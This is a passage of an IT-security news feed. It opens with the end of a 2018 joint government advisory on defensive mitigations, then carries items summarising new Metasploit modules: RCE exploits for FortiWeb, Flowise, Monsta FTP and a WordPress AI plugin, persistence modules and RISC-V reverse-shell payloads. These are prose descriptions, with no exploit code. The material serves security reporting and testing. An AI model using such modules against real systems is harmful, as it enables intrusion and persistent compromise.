<li>Manage macros carefully. Disable Microsoft Office macros, except in the specific applications where they are required.<br>Only enable macros for users that need them day-to-day and use a recent and fully patched version of Office and the underlying platform, ideally configured in line with the UK NCSC’s End User Device Security Collection Guidance and UK NCSC’s Macro Security for Microsoft Office Guidance: <a href="https://www.ncsc.gov.uk/collection/device-security-guidance" target="_blank" title="Device security guidance">Device security guidance</a> and <a href="https://www.ncsc.gov.uk/guidance/macro-security-for-microsoft-office" target="_blank" title="Macro Security for Microsoft Office">Macro Security for Microsoft Office</a>.</li>
<li>Use antivirus. Keep any antivirus software up to date, and consider use of a cloud-backed antivirus product that can benefit from the economies of scale this brings. Ensure that antivirus programs are also capable of scanning Microsoft Office macros.<br>See NCCIC Guidance: <a href="https://www.cisa.gov/news-events/news/understanding-anti-virus-software" title="Understanding Anti-Virus Software">Understanding Anti-Virus Software</a>.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/macro-security-for-microsoft-office" target="_blank" title="Macro Security for Microsoft Office">Macro Security for Microsoft Office</a>.</li>
<li>Layer organization-wide phishing defenses. Detect and quarantine as many malicious email attachments and spam as possible, before they reach your end users. Multiple layers of defense will greatly cut the chances of a compromise.</li>
<li>Treat people as your first line of defense. Tell personnel how to report suspected phishing emails, and ensure they feel confident to do so. Investigate their reports promptly and thoroughly. Never punish users for clicking phishing links or opening attachments.<br>NCCIC encourages users and administrators to report phishing to <a href="mailto:SayCISA@cisa.dhs.gov" title="Report to CISA">SayCISA@cisa.dhs.gov</a>.<br>See NCCIC Guidance: <a href="https://www.cisa.gov/news-events/news/avoiding-social-engineering-and-phishing-attacks" title="Avoiding Social Engineering and Phishing Attacks">Avoiding Social Engineering and Phishing Attacks</a>.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/phishing" target="_blank" title="Phishing attacks: defending your organisation">Phishing attacks: defending your organisation</a>.</li>
<li>Deploy a host-based intrusion detection system. A variety of products are available, free and paid-for, to suit different needs and budgets.</li>
<li>Defend your systems and networks against denial-of-service attacks.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/collection/denial-service-dos-guidance-collection" target="_blank" title="Denial of Service (DoS) guidance">Denial of Service (DoS) guidance</a>.</li>
<li>Defend your organization from ransomware. Keep safe backups of important files, protect from malware, and do not pay the ransom– it may not get your data back.<br>See NCCIC Guidance: <a href="https://www.cisa.gov/stopransomware" title="#StopRansomware">Stop Ransomware</a>.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks" target="_blank" title="Mitigating malware and ransomware attacks">Mitigating malware and ransomware attacks</a> and <a href="https://www.ncsc.gov.uk/collection/small-business-guide/backing-your-data" title="Step 1 - Backing up your data">Step 1 - Backing up your data</a>.</li>
<li>Make sure you are handling personal data appropriately and securely.<br>See NCCIC Guidance: https://www.us-cert.gov/ncas/tips/ST04-013.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/gdpr-security-outcomes" target="_blank" title="GDPR security outcomes">GDPR security outcomes</a>.  </li>
</ul>
<p>Further information: invest in preventing malware-based attacks across various scenarios. See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks" target="_blank" title="Mitigating malware and ransomware attacks">Mitigating malware and ransomware attacks</a>.</p>
<h3>Additional Resources from International Partners</h3>
<ul>
<li>Australian Cyber Security Centre (ACSC) Strategies - <a href="https://www.cyber.gov.au/resources-business-and-government/essential-cybersecurity/strategies-mitigate-cybersecurity-incidents" target="_blank" title="Strategies to mitigate cybersecurity incidents">Strategies to mitigate cybersecurity incidents</a></li>
<li>ACSC Essential Eight - <a href="https://www.cyber.gov.au/resources-business-and-government/essential-cybersecurity/essential-eight" target="_blank" title="Essential Eight">Essential Eight</a></li>
<li>Canadian Centre for Cyber Security (CCCS) Top 10 Security Actions - <a href="https://www.cyber.gc.ca/en/guidance/top-10-it-security-actions" target="_blank" title="Top 10 IT security actions">Top 10 IT security actions</a></li>
<li>CCCS Cyber Hygiene - Cyber hygiene</li>
<li>CERT New Zealand's Critical Controls 2018 - <a href="https://www.cert.govt.nz/information-and-advice/critical-controls/" target="_blank" title="Critical Controls">Critical Controls</a></li>
<li>CERT New Zealand’s Top 11 Cyber Security Tips for Your Business - https://www.cert.govt.nz/businesses-and-individuals/guides/cyber-security-your-business/top-11-cyber-security-tips-for-your-business/</li>
<li>New Zealand National Cyber Security Centre (NZ NCSC) Resources - <a href="https://www.ncsc.govt.nz/resources" target="_blank" title="Resources">Resources</a></li>
<li>New Zealand Information Security Manual - <a href="https://nzism.gcsb.govt.nz/" target="_blank" title="New Zealand Information Security Manual">New Zealand Information Security Manual</a></li>
<li>UK NCSC 10 Steps to Cyber Security - <a href="https://www.ncsc.gov.uk/collection/10-steps" target="_blank" title="10 Steps to Cyber Security">10 Steps to Cyber Security</a></li>
<li>UK NCSC Board Toolkit: five questions for your board's agenda - https://www.ncsc.gov.uk/guidance/board-toolkit-five-questions-your-boards-agenda</li>
<li>UK NCSC Cyber Security: Small Business Guide - <a href="https://www.ncsc.gov.uk/collection/small-business-guide" target="_blank" title="Small Business Guide: Cyber Security">Small Business Guide: Cyber Security</a></li>
</ul>
<div>
<h2><strong>Contact Information</strong></h2>
</div>
<p>NCCIC encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact NCCIC at:</p>
<ul>
<li>1-844-Say-CISA (From outside the United States: +1-703-235-8832)</li>
<li><a class="mailto" href="mailto:SayCISA@cisa.dhs.gov" title="Report to CISA">SayCISA@cisa.dhs.gov</a> (UNCLASS)</li>
</ul>
<p>NCCIC encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found at <a href="https://myservices.cisa.gov/irf" title="CISA Services Portal">Incident Reporting Form Index - IRF</a>.</p>
<h3>Feedback</h3>
<p>NCCIC strives to make this report a valuable tool for our partners and welcomes feedback on how this publication could be improved. You can help by answering a few short questions about this report at the following URL: <a href="https://www.cisa.gov/forms/feedback" title="CISA Website Feedback">Website Feedback</a>.</p>
<div>
<h2><strong>References</strong></h2>
<p>[1] <a href="https://www.cyber.gov.au/" target="_blank" title="Australian Cyber Security Centre (ACSC)">Australian Cyber Security Centre (ACSC)</a><br>[2] <a href="https://www.cyber.gc.ca/en" target="_blank">Canadian Centre for Cyber Security (CCCS)</a><br>[3] <a href="https://www.ncsc.govt.nz/" target="_blank" title="New Zealand National Cyber Security Centre (NZ NCSC)">New Zealand National Cyber Security Centre (NZ NCSC)</a><br>[4] <a href="https://www.ncsc.gov.uk/" target="_blank" title="United Kingdom National Cyber Security Centre">UK National Cyber Security Centre (UK NCSC)</a><br>[5] <a href="https://www.cisa.gov/" title="OWASP Top Ten">Cybersecurity and Infrastructure Security Agency (CISA)</a><br>[6] <a href="https://owasp.org/www-project-top-ten/" target="_blank" title="OWASP Top Ten">OWASP Top Ten | OWASP Foundation</a><br>[7] <a href="https://cloud.google.com/blog/topics/threat-intelligence/breaking-down-the-china-chopper-web-shell-part-ii/" target="_blank" title="Breaking Down the China Chopper Web Shell - Part II">Breaking Down the China Chopper Web Shell - Part II | Mandiant | Google Cloud Blog</a><br>[8] <a href="https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649" target="_blank" title="Microsoft Security Advisory: Update to improve credentials protection and management: May 13, 2014">Microsoft Security Advisory: Update to improve credentials protection and management: May 13, 2014 - Microsoft Support</a><br>[9] <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory" target="_blank" title="Best Practices for Securing Active Directory">Best Practices for Securing Active Directory | Microsoft Learn</a><br>[10] <a href="https://reliaquest.com/blog/powershell-security-best-practices/">PowerShell Security Best Practices</a></p>
<h2><strong>Revisions</strong></h2>
</div>
<p><strong>October 11, 2018:</strong> Initial version</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[XWiki Platform 15.10.10 Metasploit Module for Remote Code Execution (RCE)]]></title>
<description><![CDATA[Topic: XWiki Platform 15.10.10 Metasploit Module for Remote Code Execution (RCE) Risk: High Text:##  # Exploit Title: XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)   # Date: 09/01/2025  # Exploi...]]></description>
<link>https://tsecurity.de/de/3149081/sicherheitsluecken/xwiki-platform-151010-metasploit-module-for-remote-code-execution-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3149081/sicherheitsluecken/xwiki-platform-151010-metasploit-module-for-remote-code-execution-rce/</guid>
<pubDate>Tue, 09 Dec 2025 22:50:31 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: XWiki Platform 15.10.10 Metasploit Module for Remote Code Execution (RCE) Risk: High Text:##  # Exploit Title: XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)   # Date: 09/01/2025  # Exploi...]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-Suche: Auch die New York Times verklagt Perplexity - Golem.de]]></title>
<description><![CDATA[Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning. E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical Hacking ...]]></description>
<link>https://tsecurity.de/de/3145084/it-security-nachrichten/ki-suche-auch-die-new-york-times-verklagt-perplexity-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3145084/it-security-nachrichten/ki-suche-auch-die-new-york-times-verklagt-perplexity-golemde/</guid>
<pubDate>Mon, 08 Dec 2025 10:50:55 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning. E-Learning: Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 12/05/2025]]></title>
<description><![CDATA[Twonky Auth Bypass, RCEs and RISC-V Reverse Shell PayloadsThis was another fantastic week in terms of PR contribution to the Metasploit Framework. Rapid7’s very own Ryan Emmons recently disclosed CVE-2025-13315 and CVE-2025-13316 which exist in Twonky Server and allow decrypting admin credentials...]]></description>
<link>https://tsecurity.de/de/3141752/it-security-nachrichten/metasploit-wrap-up-12052025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3141752/it-security-nachrichten/metasploit-wrap-up-12052025/</guid>
<pubDate>Fri, 05 Dec 2025 22:20:15 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p></p><h2>Twonky Auth Bypass, RCEs and RISC-V Reverse Shell Payloads</h2><p>This was another fantastic week in terms of PR contribution to the Metasploit Framework. Rapid7’s very own Ryan Emmons recently disclosed CVE-2025-13315 and CVE-2025-13316 which exist in Twonky Server and allow decrypting admin credentials by reading logs without authentication (which contain them). The auxiliary module Ryan submitted which exploits both of these CVEs was released this week. Community contributor Valentin Lobsein aka Chocapikk has returned to the PR queue with a welcomed vengeance. Two modules from Chocapikk were landed this week, a Monsta FTP downloadFile Remote Code Execution module along with a WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE. In addition to some awesome module content, community contributor bcoles added Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.</p><h2>New module content (5)</h2><h3>Twonky Server Log Leak Authentication Bypass</h3><p>Author: remmons-r7 </p><p>Type: Auxiliary </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20709">#20709</a> contributed by <a href="https://github.com/remmons-r7">remmons-r7</a> </p><p>Path: gather/twonky_authbypass_logleak </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-13316&amp;referrer=blog">CVE-2025-13316</a></p><p>Description: This module exploits two CVEs: CVE-2025-13315 and CVE-2025-13316. Both CVEs exist in Twonky Server and allow decrypting admin credentials by reading logs without authentication (which contain them). Then, because the module uses hardcoded keys, it decrypts those credentials.</p><h3>Monsta FTP downloadFile Remote Code Execution</h3><p>Authors: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a>, msutovsky-r7, and watchTowr Labs </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20718">#20718</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: multi/http/monsta_ftp_downloadfile_rce </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-34299&amp;referrer=blog">CVE-2025-34299</a></p><p>Description: This add module for CVE-2025-34299. The module exploits a vulnerability in the downloadFile action which allows an attacker to connect to a malicious FTP server and download arbitrary files to arbitrary locations on the Monsta FTP server.</p><h3>WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE</h3><p>Authors: Emiliano Versini, Khaled Alenazi (Nxploited), Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a>, and dledda-r7 </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20720">#20720</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: multi/http/wp_ai_engine_mcp_rce </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-11749&amp;referrer=blog">CVE-2025-11749</a></p><p>Description: This adds a new exploit module for an unauthenticated vulnerability in the WordPress AI Engine plugin, which has over 100,000 active installations. The vulnerability allows an attacker to create an administrator account via the MCP (Model Context Protocol) endpoint without authentication, then upload and execute a malicious plugin to achieve remote code execution. The vulnerability is being tracked as CVE-2025-11749.</p><h3>Linux Command Shell, Reverse TCP Inline</h3><p>Authors: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> and modexp </p><p>Type: Payload (Single) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20712">#20712</a> contributed by <a href="https://github.com/bcoles">bcoles</a> </p><p>Path: linux/riscv32le/shell_reverse_tcp</p><p>Description: This adds Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.</p><h3>Linux Command Shell, Reverse TCP Inline</h3><p>Authors: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> and modexp </p><p>Type: Payload (Single) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20712">#20712</a> contributed by <a href="https://github.com/bcoles">bcoles</a> </p><p>Path: linux/riscv64le/shell_reverse_tcp</p><p>Description: This adds Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.</p><h2>Enhancements and features (3)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20658">#20658</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This adds a number of accuracy enhancements to the ldap_esc_vulnerable_cert_finder module. It also adds a CertificateAuthorityRhost datastore option to the esc_update_ldap_object module so the operator can specify an IP Address explicitly in cases where the hostname cannot be resolved via DNS.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20677">#20677</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This enables sessions to MSSQL servers that require encryption. These changes add a new MsTds::Channel which leverages Rex's socket abstraction to facilitate the necessary encapsulation for the TLS negotiation.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20741">#20741</a> from <a href="https://github.com/SaiSakthidar">SaiSakthidar</a> - This removes CAIN as an output format for collected hashes.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-11-27T00%3A33%3A37Z..2025-12-05T16%3A17%3A18Z%22">Pull Requests 6.4.100...6.4.101</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.100...6.4.101">Full diff 6.4.100...6.4.101</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is Metasploit? | UpGuard]]></title>
<description><![CDATA[The Metasploit Framework is an open-source framework that is used to find, exploit, and validate system vulnerabilities. Learn more about how it works.]]></description>
<link>https://tsecurity.de/de/3134822/it-security-nachrichten/what-is-metasploit-upguard/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3134822/it-security-nachrichten/what-is-metasploit-upguard/</guid>
<pubDate>Wed, 03 Dec 2025 04:22:23 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Metasploit Framework is an open-source framework that is used to find, exploit, and validate system vulnerabilities. Learn more about how it works.]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 11/28/2025]]></title>
<description><![CDATA[This week, we have added 10 new modules to Metasploit Framework including an SMB to MSSQL relay module, a remote code execution module targeting Fortinet software, additional 32-bit and 64-bit RISC-V payloads, and more.The SMB to MSSQL NTLM relay module allows users to open MSSQL sessions and run...]]></description>
<link>https://tsecurity.de/de/3127083/it-security-nachrichten/metasploit-wrap-up-11282025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3127083/it-security-nachrichten/metasploit-wrap-up-11282025/</guid>
<pubDate>Fri, 28 Nov 2025 20:23:30 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This week, we have added 10 new modules to Metasploit Framework including an SMB to MSSQL relay module, a remote code execution module targeting Fortinet software, additional 32-bit and 64-bit RISC-V payloads, and more.</p><p>The SMB to MSSQL NTLM relay module allows users to open MSSQL sessions and run arbitrary queries against a target upon success. This module supports running an SMB server which validates credentials, and then attempts to execute a relay attack against an MSSQL server. This allows for more attack paths, credential gatehering, as well as unlocking additional lateral movement and data exfiltration capabilities.</p><h2>New module content (10)</h2><h3>Microsoft Windows SMB to MSSQL Relay</h3><p>Author: Spencer McIntyre Type: Auxiliary Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20637">#20637</a> contributed by <a href="https://github.com/zeroSteiner">zeroSteiner</a> Path: server/relay/smb_to_mssql</p><p>Description: Adds a new NTLM relay module for relaying from SMB to MSSQL servers. On success, an MSSQL session will be opened to allow the user to run arbitrary queries and some modules.</p><h3>Fortinet FortiWeb unauthenticated RCE</h3><p>Authors: Defused and sfewer-r7 Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20717">#20717</a> contributed by <a href="https://github.com/sfewer-r7">sfewer-r7</a> Path: linux/http/fortinet_fortiweb_rce AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-58034&amp;referrer=blog">CVE-2025-58034</a></p><p>Description: Adds a new module chaining FortiWeb vulnerabilities CVE-20205-64446 and CVE-2025-58034 to gain unauthenticated code execution on a FortiWeb server.</p><h3>IGEL OS Privilege Escalation (via systemd service)</h3><p>Author: Zack Didcott Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20702">#20702</a> contributed by <a href="https://github.com/Zedeldi">Zedeldi</a> Path: linux/local/igel_network_priv_esc</p><p>Description: Adds 3 new modules targeting the iGEL OS. One post module abusing the SUID permissions of the setup and date binaries, one privilege escalation abusing the same SUID binary permissions to modify the NetworkManager and restart the service, allowing arbitrary executables to be run as root, and one persistence module relying on root permissions to write a command to the iGEL registry to enable execution at startup as root.</p><h3>IGEL OS Persistent Payload</h3><p>Author: Zack Didcott Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20702">#20702</a> contributed by <a href="https://github.com/Zedeldi">Zedeldi</a> Path: linux/persistence/igel_persistence</p><p>Description: Adds 3 new modules targeting the iGEL OS. One post module abusing the SUID permissions of the setup and date binaries, one privilege escalation abusing the same SUID binary permissions to modify the NetworkManager and restart the service, allowing arbitrary executables to be run as root, and one persistence module relying on root permissions to write a command to the iGEL registry to enable execution at startup as root.</p><h3>Flowise Custom MCP Remote Code Execution</h3><p>Authors: Assaf Levkovich and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20705">#20705</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> Path: multi/http/flowise_custommcp_rce AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-8943&amp;referrer=blog">CVE-2025-8943</a></p><p>Description: This adds two modules for two vulnerabilities in Flowise (<a href="https://github.com/advisories/GHSA-3gcm-f6qx-ff7p">CVE-2025-59528</a>, <a href="https://github.com/advisories/GHSA-2vv2-3x8x-4gv7">CVE-2025-8943</a>). The modules add an option to use Flowise credentials for authentication when the application requires it, enabling exploitation of vulnerabilities.</p><h3>Flowise JS Injection RCE</h3><p>Authors: Kim SooHyun (im-soohyun), Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a>, and nltt0 Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20705">#20705</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> Path: multi/http/flowise_js_rce AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-59528&amp;referrer=blog">CVE-2025-59528</a></p><p>Description: This adds two modules for two vulnerabilities in Flowise (<a href="https://github.com/advisories/GHSA-3gcm-f6qx-ff7p">CVE-2025-59528</a>, <a href="https://github.com/advisories/GHSA-2vv2-3x8x-4gv7">CVE-2025-8943</a>). The modules add an option to use Flowise credentials for authentication when the application requires it, enabling exploitation of vulnerabilities.</p><h3>Notepad++ Plugin Persistence</h3><p>Author: msutovsky-r7 Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20685">#20685</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> Path: windows/persistence/notepadpp_plugin_persistence</p><p>Description: Adds a persistence module for Notepad++ by adding a malicious plugin to Notepad++, as it blindly loads and executes DLLs from its plugin directory on startup.</p><h3>Linux Chmod 32-bit</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> Type: Payload (Single) Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20703">#20703</a> contributed by <a href="https://github.com/bcoles">bcoles</a> Path: linux/riscv32le/chmod</p><p>Description: Adds Linux RISC-V 32-bit / 64-bit Little Endian chmod payloads.</p><h3>Linux Chmod 64-bit</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> Type: Payload (Single) Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20703">#20703</a> contributed by <a href="https://github.com/bcoles">bcoles</a> Path: linux/riscv64le/chmod</p><p>Description: Adds Linux RISC-V 32-bit / 64-bit Little Endian chmod payloads.</p><h3>IGEL OS Dump File</h3><p>Author: Zack Didcott Type: Post Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20702">#20702</a> contributed by <a href="https://github.com/Zedeldi">Zedeldi</a> Path: linux/gather/igel_dump_file</p><p>Description: Adds 3 new modules targeting the iGEL OS. One post module abusing the SUID permissions of the setup and date binaries, one privilege escalation abusing the same SUID binary permissions to modify the NetworkManager and restart the service, allowing arbitrary executables to be run as root, and one persistence module relying on root permissions to write a command to the iGEL registry to enable execution at startup as root.</p><h2>Bugs fixed (3)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20482">#20482</a> from <a href="https://github.com/rodolphopivetta">rodolphopivetta</a> - This fixes a bug in HTTP-based login scanners, when SSL is enabled and a non-default HTTPS port is used.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20693">#20693</a> from <a href="https://github.com/dledda-r7">dledda-r7</a> - This fixes race condition in preloading extension klasses during bootstrap.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20721">#20721</a> from <a href="https://github.com/cpomfret-r7">cpomfret-r7</a> - Fixes a crash when running a Nexpose scan that had a Nexpose Scan Assistant credential present.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-11-20T17%3A42%3A56Z..2025-11-27T00%3A33%3A37Z%22">Pull Requests 6.4.99...6.4.100</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.99...6.4.100">Full diff 6.4.99...6.4.100</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Releases New Exploit for Fresh FortiWeb 0-Day Vulnerabilities]]></title>
<description><![CDATA[Rapid7’s Metasploit team has released a new exploit module targeting critical zero-day vulnerabilities in Fortinet’s FortiWeb web application firewall, chaining two security flaws to achieve unauthenticated remote code execution with root privileges.​ CVE ID Vulnerability Type Affected Product Im...]]></description>
<link>https://tsecurity.de/de/3114256/it-security-nachrichten/metasploit-releases-new-exploit-for-fresh-fortiweb-0-day-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3114256/it-security-nachrichten/metasploit-releases-new-exploit-for-fresh-fortiweb-0-day-vulnerabilities/</guid>
<pubDate>Sat, 22 Nov 2025 17:19:01 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Rapid7’s Metasploit team has released a new exploit module targeting critical zero-day vulnerabilities in Fortinet’s FortiWeb web application firewall, chaining two security flaws to achieve unauthenticated remote code execution with root privileges.​ CVE ID Vulnerability Type Affected Product Impact CVE-2025-64446…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/metasploit-releases-new-exploit-for-fresh-fortiweb-0-day-vulnerabilities/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/metasploit-releases-new-exploit-for-fresh-fortiweb-0-day-vulnerabilities/">Metasploit Releases New Exploit for Fresh FortiWeb 0-Day Vulnerabilities</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Adds Exploit Module for Recently Disclosed FortiWeb 0-Day Vulnerabilities]]></title>
<description><![CDATA[The Metasploit Framework has introduced a new exploit module targeting critical vulnerabilities in Fortinet’s FortiWeb Web Application Firewall (WAF). This module chains two recently disclosed flaws, CVE-2025-64446 and CVE-2025-58034, to achieve unauthenticated Remote Code Execution (RCE) with ro...]]></description>
<link>https://tsecurity.de/de/3113596/it-security-nachrichten/metasploit-adds-exploit-module-for-recently-disclosed-fortiweb-0-day-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3113596/it-security-nachrichten/metasploit-adds-exploit-module-for-recently-disclosed-fortiweb-0-day-vulnerabilities/</guid>
<pubDate>Sat, 22 Nov 2025 09:48:22 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Metasploit Framework has introduced a new exploit module targeting critical vulnerabilities in Fortinet’s FortiWeb Web Application Firewall (WAF). This module chains two recently disclosed flaws, CVE-2025-64446 and CVE-2025-58034, to achieve unauthenticated Remote Code Execution (RCE) with root privileges. The release follows reports of active exploitation in the wild, including “silent patches” and subsequent bypasses that have left many […]</p>
<p>The post <a href="https://cybersecuritynews.com/metasploit-module-fortiweb-0-day/">Metasploit Adds Exploit Module for Recently Disclosed FortiWeb 0-Day Vulnerabilities</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Adds Exploit Module for Recently Disclosed FortiWeb 0-Day Vulnerabilities]]></title>
<description><![CDATA[The Metasploit Framework has introduced a new exploit module targeting critical vulnerabilities in Fortinet’s FortiWeb Web Application Firewall (WAF). This module chains two recently disclosed flaws, CVE-2025-64446 and CVE-2025-58034, to achieve unauthenticated Remote Code Execution (RCE) with ro...]]></description>
<link>https://tsecurity.de/de/3113594/it-security-nachrichten/metasploit-adds-exploit-module-for-recently-disclosed-fortiweb-0-day-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3113594/it-security-nachrichten/metasploit-adds-exploit-module-for-recently-disclosed-fortiweb-0-day-vulnerabilities/</guid>
<pubDate>Sat, 22 Nov 2025 09:48:21 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Metasploit Framework has introduced a new exploit module targeting critical vulnerabilities in Fortinet’s FortiWeb Web Application Firewall (WAF). This module chains two recently disclosed flaws, CVE-2025-64446 and CVE-2025-58034, to achieve unauthenticated Remote Code Execution (RCE) with root privileges. The release follows reports of…</p>
